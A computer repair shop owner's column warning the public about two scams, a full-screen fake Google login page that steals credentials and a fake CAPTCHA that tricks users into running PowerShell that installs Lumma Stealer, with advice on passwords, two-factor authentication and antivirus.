This is one of my most important articles and should be shared with friends and family. This week I dissected two very dangerous internet hoaxes that are designed to steal your identity and install malware on computers. Both are new to me, and based on my research, are fairly new threats. It’s imperative you’re familiar with them so you can limit being scammed.
Google Kiosk
A person came in with what she thought was a finicky Google website. After entering her email address and password several times the screen did not close. She came in thinking it was a pretty easy fix, but 
after analyzing her system I realized it was a fishing website disguised as legitimate Google.
In a nutshell, malicious code is injected into the browser which makes the page full screen – imitating Google in kiosk mode. There is nothing to click past or out of on the screen. The code makes the browser full screen with no borders or frames and looks like the Google login screen one might use at an internet kiosk.
Based on my customer’s browser history the code came from an infected or purposefully malicious website. My customer was looking up local events when she came across the website. Similar to the Microsoft hoax I wrote about earlier, the fake login screen injects itself as soon as it’s opened.
There is minimal risk from the page itself. There is, however, a true risk in entering your Google credentials. As soon as they’re entered the username and password are sent to the scammer.
If you came across a page that looks like the one above and entered your information it’s imperative you change your Google password immediately. It’s also very important that you enable 2 factor authentication on your account. Clicking this will take you to Google’s instructions to enable 2 factor. Your email usually contains personal information about you and your account information that criminals can use to scam you. Additionally, many users also upload documents and pictures to their Google cloud account.
Fake CAPTCHA
This one took me a while to figure out. My customer came in with her son who was complaining about the computer constantly popping up PowerShell screens while he was playing his video games. It’s not normal for gamers to have viruses on their computer, which is why this one was a little perplexing to diagnose.
We’ve all seem the CAPTCHA links that make us prove we’re human or not a robot. For most of us it’s fairly normal to check the box and move forward. CAPTCHA is designed to be a simple test to make sure a human is actually behind the keyboard and it’s not a machine or computer.
Fake CAPTCHA, for lack of a better name, imitates the real one but provides additional instructions after the box is checked. Usually the instructions are to push a combination of keys. The real CAPTCHA doesn’t make us take additional steps. This should be a red flag.
This is really nasty because it executes scripts behind the scenes that run within PowerShell – a Windows based terminal used for executing code. From what I could tell it appears to install Lumma Stealer or some variant of it. The data in PowerShell appears to be encrypted which made it hard to detect and somewhat difficult for me to remove. Lumma Stealer uploads data from the computer to a remote location without user consent.
I was able to delete the Lumma Stealer virus with a combination of manual scanning and automated software. Automated software alone did not delete the virus completely. I duplicated the virus on my computer and the antivirus software seemed to prevent the virus from infecting my test machine.
Conclusion
Both of these viruses are disturbing because they do away with the alarming behavior of the Microsoft Scam which makes noise and flashes. Instead, these closely mimic internet things we’re used to seeing and interacting with. The simple reality is most people use Google and Gmail regularly and are used to entering our credentials. Without thinking, we check the CAPTCHA box to advance to the next page.
My suggestion is to keep an eye out for things that seem out of place and keep your virus software up-to-date.
Jeromy is the President of Laptop & Computer Repair, Inc. He can be reached through the website at https://www.localcomputerwiz.com